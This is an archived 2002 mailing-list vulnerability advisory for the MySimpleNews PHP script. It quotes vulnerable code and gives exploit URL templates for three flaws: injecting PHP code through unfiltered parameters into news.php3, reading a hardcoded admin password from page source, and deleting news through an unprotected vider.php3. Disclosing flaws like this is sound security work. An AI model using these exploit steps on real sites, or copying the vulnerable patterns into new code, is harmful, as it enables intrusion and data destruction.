Informations :
°°°°°°°°°°°°°°
Language : PHP
Tested version : 1
Website : ?
Comment : Very simple code.
a) Writing PHP code in a PHP file and execution of this code.
Problem :
°°°°°°°°°
----------------- users.php -----------------
<?
$fp=fopen("news.php3","a");
fwrite($fp,"Posté Par [$LOGIN]\n");
fwrite($fp,"Le $DATA\n<br>");
fwrite($fp,"$MESS\n<hr>");
fclose($fp);
?>
----------------- users.php -----------------
Exploit :
°°°°°°°°°
http://[target]/users.php?LOGIN=[PHP code]
or
http://[target]/users.php?DATA=[PHP code]
or
http://[target]/users.php?MESS=[PHP code]
Execution : http://[target]/news.php3
b) Recovery of admin's password.
Problem :
°°°°°°°°°
------------------ admin.html ------------------
moncode = prompt('MySimpleNews - Administration','');
if (moncode != "[PASSWORD]")
{
location.href="about:Erreur 403";
}
------------------ admin.html ------------------
Exploit :
°°°°°°°°°
view-source:http://[target]/admin.html
c) Deleting news.
Problem :
°°°°°°°°°
No security in the file.
Exploit :
°°°°°°°°°
http://[target]/vider.php3
Patch :
°°°°°°°
Use of htaccess.
More details in french :
http://www.frog-man.org/tutos/MySimpleNews.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMySimpleNews.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
Discutez en ligne avec vos amis ! http://messenger.msn.fr
This archive was generated by hypermail 2b30 : Wed Oct 02 2002 - 15:30:36 PDT